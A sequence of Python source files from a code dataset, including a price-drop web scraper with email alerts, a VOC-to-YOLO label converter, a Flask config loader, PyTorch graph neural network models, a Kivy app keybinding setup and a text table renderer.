test_sub_items(self):\n a2 = DbxObject(data_folder_entries)\n self.assertEquals(3, len(a2.sub_items))\n\n def test_path(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"/test/subfolder/a6w.odt\", a2.path)\n\n def test_basename(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"a6w.odt\", a2.basename)\n\n def test_parent_path(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"/test/subfolder\", a2.parent_path)\n\n def test_server_modified(self):\n a2 = DbxObject(data_file)\n t = a2.server_modified\n # self.assertEquals(data_file['server_modified'],t.strftime(\"%Y-%m-%dT%H:%M:%SZ\"))\n self.assertEquals(1505629042, t)\n\n def test_server_modified_folder(self):\n now = int(time.time())\n a2 = DbxObject(data_folder_entries_recursive)\n t = a2.server_modified\n self.assertGreaterEqual(t, now)\n\n def test_client_modified(self):\n a2 = DbxObject(data_file)\n t = a2.client_modified\n # 
self.assertEquals(data_file['client_modified'],t.strftime(\"%Y-%m-%dT%H:%M:%SZ\"))\n self.assertEquals(1505629042, t)\n\n def test_client_modified_folder(self):\n now = int(time.time())\n a2 = DbxObject(data_folder_entries_recursive)\n t = a2.client_modified\n self.assertGreaterEqual(t, now)\n\n def test_size(self):\n a2 = DbxObject(data_file)\n self.assertEquals(19754, a2.size)\n","sub_path":"tests/test_dbxobject.py","file_name":"test_dbxobject.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419662028","text":"# import libraries\nimport smtplib\nimport json\nimport time\nimport requests\nimport re\nimport os\nfrom random import choice\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\n\n# notification email\ndef send_mail(message):\n sender = 'from@fromdomain.com'\n receivers = ['to@todomain.com']\n message = ( \n \"From: From Person \\n\"\n \"To: To Person \\n\"\n \"Subject: A price has dropped for one of your tracked products\\n\"\n \"{}.\\n\".format(message)\n )\n try:\n smtpObj = smtplib.SMTP('localhost', 1025)\n smtpObj.sendmail(sender, receivers, message) \n r = \" Successfully sent email.\\n\"\n except:\n r = error_header + \" Email was not sent. Make sure to follow the instructions in Help to launch a debugging SMTP server.\\n\"\n return r\n\n\n# update json file\ndef update_json(trackers, file = 'tracker.json'):\n with open(file, 'w') as f:\n json.dump(trackers, f, indent = 4)\n\n\n# initiate browser session and retrieve and return webpage data\ndef get_session(url):\n if \"bestbuy.com\" in url: # beautifulsoup is faster and headless so I prefer this method for compatible websites\n with open('headers.json') as file:\n data = json.load(file)\n header = data[choice(list(data.keys()))] # random header picker -- originally used as a clever way to prevent amazon blocking scrape, but that no longer works so I switched to Selenium\n r = requests.Session()\n response = r.get(url, headers = header)\n page = BeautifulSoup(response.content, 'html.parser')\n else: # selenium is used for target and amazon\n PATH = os.getcwd() + driver\n page = webdriver.Chrome(PATH)\n page.get(url)\n return page\n\n\n# builds the different messages printed to screen for each command\ndef start_msg(command, message, quit = False):\n os.system(clear)\n c = command\n m = message \n arrow_a = ''\n arrow_v = ''\n arrow_t = '' \n arrow_q = '' \n print(\n \"///// PRICE DROP SCRAPER ///////\\n\"\n \" Monitors the price of chosen products from popular retailers and emails if the price drops.\\n\"\n \" Created by Wesley Cox for Code Louisville 2020 Python\"\n )\n retailer_list = (\n \"\\n///// RETAILERS ////////////////\\n\"\n \" amazon.com\\n\"\n \" bestbuy.com\\n\"\n \" target.com\\n\"\n )\n if c in ('v', 't'): # this block \n if any([len(trackers[i]) > 0 for i in trackers]): # if any products are saved we want to list them and save them for later.\n m = list_trackers(c) + m\n if c == 'v':\n arrow_v = \" <--\"\n if c == 't':\n print(\n \"\\n///// IMPORTANT ////////////////\\n\"\n \" The intent of this command is to check all saved product pages every 43200 seconds (12 hours),\\n\"\n \" compare saved price with current price, and send an email if the price has dropped.\\n\"\n \" However, this is a proof-of-concept demonstration. This app is not currently setup to actually track persistently or send emails.\\n\"\n \" This command simply allows testing of those functions. 
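The 12-hour cadence described in that notice boils down to a poll-compare-notify loop. A minimal sketch of that shape, independent of this app's scrape() and send_mail() implementations (the callbacks and interval are placeholders):

```python
import time

def track(url, get_price, saved_price, notify, interval=43200):
    """Poll a product page at a fixed interval and notify on a price drop."""
    while True:
        current = get_price(url)
        if current < saved_price:
            notify(f"price dropped from {saved_price} to {current}: {url}")
            saved_price = current  # only alert again on a further drop
        time.sleep(interval)
```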
Type h and press enter/return for more details.\\n\"\n )\n arrow_t = \" <--\"\n else: # if no products are saved we want to block v and t commands.\n c = 'a'\n arrow_a = \" <--\"\n m = alert_header + ' There are no product pages being tracked. Add at least one product to execute \"Remove Products\" or \"Track Price\" commands.\\n'\n elif c == 'a':\n arrow_a = \" <--\"\n m = retailer_list + m\n else:\n arrow_q = \" <--\"\n if not quit:\n m = m + ( \"\\n///// COMMANDS /////////////////\\n\"\n \" a: Add products\" + arrow_a + \"\\n\"\n \" v: View or remove products\" + arrow_v + \"\\n\"\n \" t: Track price\" + arrow_t + \"\\n\"\n \" h: Help\\n\"\n \" ^+c: Quit app\" + arrow_q + \"\\n\"\n )\n print(m)\n return c\n \n \n# web scraper\ndef scrape(url, update = True):\n http = re.search('^https:\\/\\/www.(bestbuy.com|amazon.com|target.com)', url[:25]) # only need to search beginning of url string\n if http:\n retailer = url[url.find('.')+1:url.find('.com')] + '.com'\n print('\\n' + alert_header + \" Processing...\\n\")\n try:\n page = get_session(url)\n except:\n r = error_header + ' Configuration issue with Selenium or Beautiful Soup.\\n Make sure they\\'re installed and that the \"chromedriver\" file is saved in the current directory.\\n'\n else:\n dict = {'title': '', 'price': '', 'url': url}\n try:\n if \"target.com\" in url:\n price = page.find_element_by_xpath('/html/body/div[1]/div/div[5]/div/div[2]/div[2]/div[1]/div[1]/div[1]').text\n dict['title'] = page.title\n page.quit()\n elif \"amazon.com\" in url:\n try:\n price = page.find_element_by_id(\"priceblock_ourprice\").text\n except:\n price = page.find_element_by_id(\"priceblock_dealprice\").text\n dict['title'] = page.title\n page.quit()\n elif \"bestbuy.com\" in url:\n with open('bestbuy.json', 'w') as f:\n json.dump(page, f, indent=4, default=str)\n price = page.find(attrs = {'class':'priceView-hero-price priceView-customer-price'}).span.get_text()\n dict['title'] = page.find(attrs = {'class':'sku-title'}).get_text()\n dict['price'] = float(price.replace(',','')[1:])\n if update:\n trackers[retailer].append(dict)\n update_json(trackers)\n r = success_header + \" {} from {} is now being tracked.\\n\".format(dict['title'], retailer)\n else:\n r = dict['price']\n except:\n r = error_header + ' Was not able to find a price. Either the URL is not a product page or product is no longer available.\\n Type h and press enter/return for more details.\\n'\n else:\n r = error_header + ' Not a valid command or URL. 
Needs to be a command from the list below or a complete URL including \"http(s)://\" and from compatible retailer.\\n Type h and press enter/return for more details.\\n'\n try:\n page.quit()\n except:\n pass\n return r\n\n\n# periodically scrapes saved urls and sends email if price has dropped\ndef tracker(ui):\n retailer, title, price, url, tmp = tracker_list[0]\n price_override = price + 10\n if ui == 'y':\n t = 30\n print('\\n///// WAITING //////////////////')\n while t > 10:\n print(' ', str(t), 'seconds...')\n t -= 10\n time.sleep(10)\n while t > 0:\n if t == 1:\n print(' ', str(t), 'second...')\n else:\n print(' ', str(t), 'seconds...')\n t -= 1\n time.sleep(1)\n try:\n new_price = scrape(url, False)\n m = success_header + \" Last scrape: \" + str(time.ctime()) + '\\n'\n if new_price < price_override:\n drop = '{:.2f}'.format(price_override - new_price)\n msg = \"{} from {} dropped by ${}:\\n{}\".format(title, retailer, drop, url)\n email = send_mail(msg)\n m += f' Price dropped ${drop}\\n' + email\n else:\n m += ' Price did not drop.\\n' # this shouldn't ever trigger since we're intentionally making price higher. \n except:\n m = error_header + \" There was an ERROR processing the URL. It's possible the product is no longer available or the webpage has changed.\\n\"\n elif ui == 'n':\n m = alert_header + ' Tracker not started. You can exit using one of the commands in the menu.\\n'\n else:\n m = error_header + ' Invalid command. Choose yes or no or a valid command from the menu.\\n Type h and press enter return for more details.\\n'\n return m\n\n\ndef view(ui):\n try: # need to test that user input was a valid number before we proceed.\n ui = int(ui)\n if ui < 1: # negatives aren't necessarily out of range so we need to catch those. \n raise Exception\n title = tracker_list[ui-1][1]\n except:\n m = error_header + \" Not a valid command or number option. Type h(v) and press enter/return for more details.\\n\"\n else:\n sure = input(\"\\nAre you sure you want to delete {}? 
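The retailer check at the top of scrape() runs a regex with unescaped dots over only the first 25 characters of the URL, so near-miss hosts can slip through. A stricter validation sketch using urllib.parse (the retailer list is copied from the app; the helper name is hypothetical):

```python
from urllib.parse import urlparse

RETAILERS = {"www.amazon.com", "www.target.com", "www.bestbuy.com"}

def retailer_of(url: str):
    """Return the retailer domain for a supported product URL, else None."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or parts.netloc not in RETAILERS:
        return None
    return parts.netloc[len("www."):]

assert retailer_of("https://www.bestbuy.com/site/some-product") == "bestbuy.com"
assert retailer_of("https://wwwxbestbuy.com/site/x") is None
```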
(y/n):\n\".format(title)).lower()\n        if sure == 'y': # delete tracker and update json\n            del trackers[tracker_list[ui-1][0]][tracker_list[ui-1][4]]\n            update_json(trackers)\n            m = success_header + \" Product successfully removed.\\n\"\n        else:\n            m = alert_header + ' No products were removed.\\n'\n    return m\n\n\n# checks to see if user input is a command rather than an option\ndef command_menu(ui, command):\n    ui = ui.lower()\n    h = re.search(\"^h\\((.*)\\)$\", ui) \n    if ui == 'h':\n        r = help(command, True)\n    elif h:\n        opt = h.groups()[0]\n        r = help(opt)\n    elif ui == '^+c':\n        r = help(ui)\n    elif ui in ('a', 'v', 't'):\n        r = 'command'\n    else:\n        r = 'option'\n    return r\n\n\n# pretty prints trackers.json data and creates list for data removal\ndef list_trackers(command):\n    c = command\n    count = 0\n    m = ''\n    for retailer in trackers:\n        tracker_count = 0\n        if len(trackers[retailer]) > 0:\n            m += ' ' + retailer + ':\\n'\n            for key in trackers[retailer]:\n                count += 1\n                tracker_list.append([retailer, key['title'], key['price'], key['url'], tracker_count])\n                tracker_count += 1\n                m += '\\t' + str(count) + ': ' + key['title'] + '\\n'\n                m += '\\t    $' + format(key['price'], '.2f') + '\\n'\n    if c == 'v':\n        m = \"\\n///// TRACKED PRODUCTS //////////\\n\" + m\n    if c == 't':\n        m = (\n            \"///// TRACKED PRODUCT SAMPLE ////\\n\" + ' ' +\n            tracker_list[0][1] + '\\n' +\n            \"    $\" + '{:.2f}'.format(tracker_list[0][2]) +\n            \"\\n\\n///// PRICE OVERRIDE ////////////\\n\" +\n            \"    $\" + '{:.2f}'.format(tracker_list[0][2] + 10) + '\\n'\n        )\n    return m \n\n\ndef quit():\n    try:\n        m = ''\n        c = '^+c'\n        while True:\n            start_msg(c, m)\n            ui = input('Do you want to completely exit app and stop tracking (y) or choose a different command?: ').lower()\n            if ui == 'y':\n                m = alert_header + ' App was closed and is no longer tracking product price changes.'\n                start_msg(c, m, True)\n                break # end loop and app stops running\n            else:\n                r = command_menu(ui, '^+c')\n                if r == 'command':\n                    break # end loop and call commands() to restart with new user input\n                elif r == 'option':\n                    m = error_header + ' Invalid command. Please type the letter y and press enter/return or choose a command from the menu.\\n'\n                else:\n                    m = r\n        if ui != 'y':\n            commands(ui) # restarts app with new command\n    except KeyboardInterrupt:\n        m = alert_header + ' App was forced closed and is no longer tracking product price changes.'\n        start_msg(c, m, True)\n\n\n# user interface:\ndef commands(command, message = ''):\n    c = command\n    m = message\n    try:\n        while True:\n            c = start_msg(c, m) # checks if any trackers are saved, resets c if not, and prints appropriate messages to the screen.\n            if c == 'a': # different inputs for each command\n                ui = input(\"Copy/paste the complete URL from a product page to track or enter a command: \")\n            if c == 'v':\n                ui = input(\"Type the corresponding number to remove an item or enter a command: \")\n            if c == 't':\n                ui = input('Are you ready to test tracker and email? 
(y/n): ')\n r = command_menu(ui, c) # check if input is an attempt to change commands, get help, or argument for current command.\n if r == 'option': # this means the input was not a help request or different command so it might be a valid option or argument for this command's functions.\n if c == 'a':\n m = scrape(ui) # this method checks that input is valid URL, then scrapes for price, then returns success or errors.\n if c == 'v':\n m = view(ui) # lists and numbers are products being tracked and gives option to remove one.\n if c == 't':\n m = tracker(ui) # picks 1 product from tracker.json, overrides the price with higher amount, scrapes webpage again, checks if price is lower, and sends test email if it is.\n elif r == 'command': \n c = ui.lower()\n m = ''\n else: # this means input was help request and simply prints that data to screen. \n m = r\n except KeyboardInterrupt:\n quit()\n\n\n# help requests\ndef help(command, h = False):\n tail = ''\n if h:\n tail = '\\n You can get help for inactive commands by typing h(command), i.e. h(^+c) for help with \"Quit app\" or h(a) for help with \"Add products.\"\\n'\n if command == 'a':\n r = (\n ' Copy/paste a complete URL (including \"http(s)://\") from a product page from Amazon, Target, or Best Buy.\\n'\n \" No other retailers will work. Must be a product page. List pages and search results will not work.\\n\"\n \" Product page must have a price listed. Pre-orders and out-of-stock items might not be compatible.\\n\"\n \" Press enter and the app will check that the URL is valid. If so, the app scrapes the URL, finds the price,\\n\"\n \" and stores the details in the tracker.json file. This is the default command for the app.\\n\" + tail\n )\n elif command == 'v':\n r = (\n \" To remove a product from the list enter the corresponding number of the product to be removed and press enter/return.\\n\"\n \" The product will be deleted from the tracker.json file. This command requires at least 1 product to be saved in the tracker.json file.\\n\" \n ' Will automatically switch to the default command of \"Add products\" if there are not products being tracked.\\n' + tail\n )\n elif command == 't':\n r = (\n \" Manually overrides 1 saved product's price with a higher price. 30 seconds later the app will scrape the URL again,\\n\"\n \" compare the current price with the higher override price, print a confirmation to the screen and then send a test email.\\n\"\n \" To test the email functionality a local SMTP server must be running.\\n\"\n \" Copy/paste the command below in a seperate terminal/command prompt session.\\n\\n\"\n \" python3 -m smtpd -c DebuggingServer -n localhost:1025\\n\\n\"\n \" If the server is not running, all the other steps will still take place as described above.\\n\"\n \" There must be saved products in the tracker.json file to execute this command.\\n\"\n \" Once you are tracking, you must press the control key and the letter c key (^+c) to exit. All other commands are ignored.\\n\" + tail\n )\n elif command == '^+c':\n r = \" ^+c represents a key combination and not literal characters. Press the control key and the letter c key at the same time.\\n Gives you the option to completely quit and exit app. Tracking will not work if app is quit. For tracking, use command 't'.\\n\" + tail\n else:\n r = \" Invalid option for the help command. 
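The h(command) syntax that help() serves is recognized in command_menu with a single anchored regex. A standalone sketch of that dispatch (the function name is hypothetical):

```python
import re

def parse_help_request(ui: str):
    """Return the command named in 'h(command)', 'current' for bare 'h', else None."""
    ui = ui.strip().lower()
    if ui == "h":
        return "current"
    match = re.search(r"^h\((.*)\)$", ui)
    return match.group(1) if match else None

assert parse_help_request("h(a)") == "a"
assert parse_help_request("H(^+c)") == "^+c"
assert parse_help_request("help") is None
```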
Type h and press return/enter for more details\\n\" + tail\n return \"\\n///// HELP /////////////////////\\n\" + r\n\n\nif __name__ == '__main__':\n# initialize json file\n trackers = {'amazon.com':[], 'target.com':[], 'bestbuy.com': []}\n try:\n with open('tracker.json') as file:\n trackers = json.load(file)\n except:\n update_json(trackers)\n\n# os dependencies\n if os.name == 'posix':\n clear = 'clear'\n driver = '/chromedriver'\n else:\n clear = 'cls'\n driver = '\\\\chromedriver'\n\n# globals\n tracker_list = []\n error_header = \"\\n///// ERROR ////////////////////\\n\"\n success_header = \"\\n///// SUCCESS //////////////////\\n\"\n alert_header = \"\\n///// ALERT ////////////////////\\n\"\n \n# initialize interface\n commands('a')","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":16884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"448781894","text":"import xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\n\n\ndef convert(size, box):\n # size=(width, height) b=(xmin, xmax, ymin, ymax)\n # x_center = (xmax+xmin)/2 y_center = (ymax+ymin)/2\n # x = x_center / width y = y_center / height\n # w = (xmax-xmin) / width h = (ymax-ymin) / height\n\n x_center = (box[0] + box[1]) / 2.0\n y_center = (box[2] + box[3]) / 2.0\n x = x_center / size[0]\n y = y_center / size[1]\n \n w = (box[1] - box[0]) / size[0]\n h = (box[3] - box[2]) / size[1] \n\n # print(x, y, w, h)\n return ('%.6f' %x, '%.6f' %y, '%.6f' %w, '%.6f' %h)\n\n\ndef convert_annotation(xml_files_path, save_txt_files_path, classes):\n xml_files = os.listdir(xml_files_path)\n print(xml_files)\n for xml_name in xml_files:\n print(xml_name)\n xml_file = os.path.join(xml_files_path, xml_name)\n out_txt_path = os.path.join(save_txt_files_path, xml_name.split('.')[0] + '.txt')\n out_txt_f = open(out_txt_path, 'w')\n #读取xml,输入xml的存储路径\n tree = ET.parse(xml_file)\n #获取根节点\n root = tree.getroot()\n #获取图片的大小\n size = root.find('size')\n w = int(size.find('width').text)\n h = int(size.find('height').text)\n # print(root)\n\n#遍历根节点,迭代名为object\n for obj in root.iter('object'):\n # print(obj)\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult) == 1:\n continue\n cls_id = classes.index(cls)\n # print(type(cls_id),cls_id)\n xmlbox = obj.find('bndbox')\n b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text),\n float(xmlbox.find('ymax').text))\n # b=(xmin, xmax, ymin, ymax)\n print(w, h, b)\n bb = convert((w, h), b)\n out_txt_f.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\n\nif __name__ == \"__main__\":\n # 测试程序\n # classes = ['hard_hat', 'other', 'regular', 'long_hair', 'braid', 'bald', 'beard']\n # xml_files = r'D:\\ZF\\1_ZF_proj\\3_脚本程序\\2_voc格式转yolo格式\\voc_labels'\n # save_txt_files = r'D:\\ZF\\1_ZF_proj\\3_脚本程序\\2_voc格式转yolo格式\\yolo_labels'\n # convert_annotation(xml_files, save_txt_files, classes)\n\n # ====================================================================================================\n # 把帽子头发胡子的voc的xml标签文件转化为yolo的txt标签文件\n # 1、类别\n # classes1 = ['<3mm', '3-6mm', '>6mm', 'crane', 'overlength(1.2-1.5m)', 'overlength(1.5-2m)', 'overlength(>2m)',\n # 'inclusion', 'airtight']\n # classes2 = ['<3mm', '3-6mm', 'greasy dirt', 'paint', 'airtight container', 'galvanized', 'boxcar']\n # classes3 = ['Iron Filings', 'Gunny bag']\n # classes3 = 
['code']\n # classes4 = ['Motor Vehicle', 'Non-motorized Vehicle', 'Pedestrian', 'Traffic Light-Red Light',\n # 'Traffic Light-Yellow Light', 'Traffic Light-Green Light', 'Traffic Light-Off']\n # classes5 = ['1', '2', '3', '4', '5', '6', '7']\n classes6 = ['<3mm', '3-6mm', '>6mm', 'paint', 'galvanized','greasy dirt', 'inclusion']\n # 2、voc格式的xml标签文件路径\n xml_files1 = r'/home/yups/startypsh/Learn-deweight/xml/'\n # 3、转化为yolo格式的txt标签文件存储路径\n save_txt_files1 = r'/home/yups/startypsh/Learn-deweight/xml-txt/'\n\n convert_annotation(xml_files1, save_txt_files1, classes6)\n","sub_path":"exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"489144309","text":"# encoding: utf-8\nimport os\nimport distutils.util\nfrom types import MethodType\nimport datetime\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Config(object):\n PROFILE = False\n DEBUG = True\n SQLALCHEMY_ECHO = True\n JWT_TOKEN_LOCATION = 'cookies'\n JWT_ACCESS_TOKEN_EXPIRES = datetime.timedelta(days=1)\n TESTING = False\n HASH_ROUND = 50\n\n # SQLAlchemy\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n SQLALCHEMY_DATABASE_URI = \"sqlite:////home/michael/9cumber.db\"\n\n # Amazon API\n SECRET_KEY = \"dummy\"\n API_ACCESS_KEY = \"dummy\"\n API_SECRET_KEY = \"dummy\"\n ASSOCIATE_ID = \"dummy\"\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass _TestingConfig(Config):\n SERVER_NAME = \"localhost\"\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n SQLALCHEMY_ECHO = False\n\n\ndef load_env():\n # {env_name: config_name}\n env_to_config_table = {\n \"SERVER_DEBUG\": \"DEBUG\",\n \"SERVER_TESTING\": \"TESTING\",\n \"SERVER_PROFILE\": \"PROFILE\",\n \"SERVER_SQLALCHEMY_ECHO\": \"SQLALCHEMY_ECHO\",\n \"SERVER_SQLALCHEMY_DATABASE_URI\": \"SQLALCHEMY_DATABASE_URI\",\n \"SERVER_AMAZON_SECRET_KEY\": \"SECRET_KEY\",\n \"SERVER_AMAZON_API_ACCESS_KEY\": \"API_ACCESS_KEY\",\n \"SERVER_AMAZON_API_SECRET_KEY\": \"API_SECRET_KEY\",\n \"SERVER_AMAZON_ASSOCIATE_ID\": \"ASSOCIATE_ID\"\n }\n\n result = {}\n for env_name, config_name in env_to_config_table.items():\n value = os.getenv(env_name)\n if value is None:\n continue\n elif value in ['True', 'False', 'true', 'false']:\n result.update({config_name: distutils.util.strtobool(value)})\n else:\n result.update({config_name: str(value)})\n\n return result\n\n\nconfig = {\n \"current\": type('CurrentConfig', (Config, ), load_env()),\n \"testing\": _TestingConfig\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"364121492","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import Module\nimport torch.nn.functional as F\nimport math\nfrom torch.autograd import Variable\n\n\nclass SGC(nn.Module):\n \"\"\"\n A Simple PyTorch Implementation of Logistic Regression.\n Assuming the features have been preprocessed with k-step graph propagation.\n \"\"\"\n\n def __init__(self, nfeat, nclass):\n super(SGC, self).__init__()\n\n self.W = nn.Linear(nfeat, nclass)\n\n def forward(self, x):\n h1 = self.W(x)\n return h1\n\n\nclass SGC_multi_hid(nn.Module):\n \"\"\"\n Morton added.\n \"\"\"\n\n def __init__(self, nfeat, nclass, dropout):\n super(SGC_multi_hid, self).__init__()\n\n self.W1 = nn.Linear(nfeat, 256, bias=True)\n self.W2 = nn.Linear(256, nclass, bias=True)\n # self.W3 = nn.Linear(600, nclass, 
bias=True)\n self.dropout = dropout\n\n def forward(self, x):\n x = self.W1(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.W2(x)\n x = F.dropout(x, self.dropout, training=self.training)\n # x = self.W3(x)\n # x = F.dropout(x, self.dropout, training=self.training)\n return x\n\n\nclass GraphConvolution(Module):\n \"\"\"\n A Graph Convolution Layer (GCN)\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.W = nn.Linear(in_features, out_features, bias=bias)\n self.init()\n\n def init(self):\n stdv = 1. / math.sqrt(self.W.weight.size(1))\n self.W.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n support = self.W(input)\n output = torch.spmm(adj, support)\n return output\n\n\nclass GCN(nn.Module):\n \"\"\"\n A Two-layer GCN.\n \"\"\"\n\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, 1024)\n self.gc3 = GraphConvolution(1024, nclass)\n self.dropout = dropout\n\n def forward(self, x, adj, use_relu=True):\n x = self.gc1(x, adj)\n if use_relu:\n x = F.relu(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n if use_relu:\n x = F.relu(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc3(x, adj)\n return x\n\n\nclass HGNN(nn.Module):\n \"\"\"\n A Two-layer HGNN.\n \"\"\"\n\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(HGNN, self).__init__()\n print(\"HGNN model starting...\")\n\n self.cluster_W_1 = nn.Linear(nfeat, nfeat, bias=True)\n self.user_W_1 = nn.Linear(2 * nfeat, 2 * nfeat, bias=True)\n self.cluster_W_2 = nn.Linear(2 * nfeat, 2 * nfeat, bias=True)\n self.user_W_2 = nn.Linear(4 * nfeat, 4 * nfeat, bias=True)\n self.output_W = nn.Linear(4 * nfeat, nclass, bias=True)\n self.dropout = dropout\n # self.cluster_feat_new = Variable(torch.zeros(nclass, nfeat))\n\n def forward(self, features, node2cluster_arr, cluster_nodes=None, cluster_adj=None):\n if cluster_nodes is None and cluster_adj is None:\n feat_with_hops_1 = torch.mm(node2cluster_arr, self.cluster_feat_new_1)\n user_features_1 = self.user_W_1(torch.cat([features, feat_with_hops_1], dim=1))\n feat_with_hops_2 = torch.mm(node2cluster_arr, self.cluster_feat_new_2)\n user_features_2 = self.user_W_2(torch.cat([user_features_1, feat_with_hops_2], dim=1))\n\n out = self.output_W(user_features_2)\n out = F.dropout(out, self.dropout, training=self.training)\n return out\n else:\n cluster_feat_1 = torch.mm(cluster_nodes, features)\n self.cluster_feat_new_1 = self.cluster_W_1(torch.mm(cluster_adj, cluster_feat_1))\n feat_with_hops_1 = torch.mm(node2cluster_arr, self.cluster_feat_new_1)\n user_features_1 = self.user_W_1(torch.cat([features, feat_with_hops_1], dim=1))\n # user_features = F.dropout(user_features, self.dropout, training=self.training)\n\n cluster_feat_2 = torch.mm(cluster_nodes, user_features_1)\n self.cluster_feat_new_2 = self.cluster_W_2(torch.mm(cluster_adj, cluster_feat_2))\n feat_with_hops_2 = torch.mm(node2cluster_arr, self.cluster_feat_new_2)\n user_features_2 = self.user_W_2(torch.cat([user_features_1, feat_with_hops_2], dim=1))\n # user_features = F.dropout(user_features, self.dropout, training=self.training)\n\n out = self.output_W(user_features_2)\n # out = F.dropout(out, self.dropout, training=self.training)\n return out\n\n\ndef get_model(model_opt, nfeat, nclass, 
nhid=0, dropout=0.1, usecuda=False):\n if model_opt == \"GCN\":\n model = GCN(nfeat=nfeat,\n nhid=nhid,\n nclass=nclass,\n dropout=dropout)\n\n elif model_opt == \"SGC\":\n model = SGC(nfeat=nfeat,\n nclass=nclass)\n\n elif model_opt == \"SGC_multi_hid\":\n model = SGC_multi_hid(nfeat=nfeat,\n nclass=nclass,\n dropout=dropout)\n elif model_opt == \"HGNN\":\n model = HGNN(nfeat=nfeat,\n nhid=nhid,\n nclass=nclass,\n dropout=dropout)\n\n else:\n raise NotImplementedError('model:{} is not implemented!'.format(model_opt))\n\n if usecuda:\n model.cuda()\n return model\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"130144490","text":"from kivy.config import Config\nConfig.set('kivy', 'exit_on_escape', 0)\n\nfrom pkas import PKApp\nfrom src.base import PKOSRoot\n\n\nclass PKOS(PKApp):\n\n def build(self):\n return PKOSRoot()\n\n def build_config(self, config):\n config.setdefaults('keybinds', {\n 'left': '[\"a\", \"left\"]',\n 'right': '[\"d\", \"right\"]',\n 'up': '[\"w\", \"up\"]',\n 'down': '[\"s\", \"down\"]',\n 'toggle_overlay': '\"`\"',\n 'select': '\"space\"',\n 'delve': '[\"e\", \"enter\"]',\n 'ascend': '[\"q\", \"shift enter\"]',\n 'toggle_menu' : '\"escape\"',\n\n 'tab' : '[\"ctrl tab\", \"ctrl pagedown\"]',\n 'untab' : '[\"ctrl shift tab\", \"ctrl pageup\"]',\n\n 'close_tab' : '\"ctrl w\"',\n 'new_tab' : '\"ctrl t\"',\n 'save' : '\"ctrl s\"',\n 'shift_up' : '[\"ctrl shift pageup\"]',\n 'shift_down' : '[\"ctrl shift pagedown\"]',\n 'tabs_right' : '\"ctrl right\"',\n 'tabs_left' : '\"ctrl left\"'\n\n })\n\n\n\n\nif __name__ == '__main__':\n app = PKOS()\n app.run()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"117981877","text":"from collections import OrderedDict\n\nL_UPP_ANGLE = '┌'\nL_DOWN_ANGLE = '└'\nR_UPP_ANGLE = '┐'\nR_DOWN_ANGLE = '┘'\nLINE_C_DOWN = '┬'\nLINE_C_UPP = '┴'\nLINE_H = '─'\nLINE_W = '│'\n\n\nclass TableRender:\n def __init__(self):\n self.table = OrderedDict()\n self.column_lens = OrderedDict()\n\n def add_column(self, name: str):\n self.table[name] = []\n self.column_lens[name] = len(name)\n\n def write_in_column(self, column_name: str, value):\n if not isinstance(value, str) and value is not None:\n value = str(value)\n\n if column_name not in self.table:\n self.add_column(column_name)\n\n self.table[column_name].append(value)\n self.column_lens[column_name] = max(self.column_lens[column_name], len(value or ''))\n\n def render(self) -> str:\n table = L_UPP_ANGLE\n\n table += LINE_C_DOWN.join(column_name.center(self.column_lens[column_name], LINE_H)\n for column_name in self.table) + R_UPP_ANGLE + '\\n'\n\n for num_row in range(max(len(column) for column in self.table.values())):\n row = LINE_W.join((rows[num_row] or '').ljust(self.column_lens[name_column])\n for name_column, rows in self.table.items())\n table += LINE_W + row + LINE_W + '\\n'\n\n down_row = L_DOWN_ANGLE + LINE_C_UPP.join(value * LINE_H for value in self.column_lens.values()) + R_DOWN_ANGLE\n\n table = table + down_row\n return table\n","sub_path":"filewatcher/utils/table_render.py","file_name":"table_render.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"149401798","text":"def insertionSort (data):\n length = 
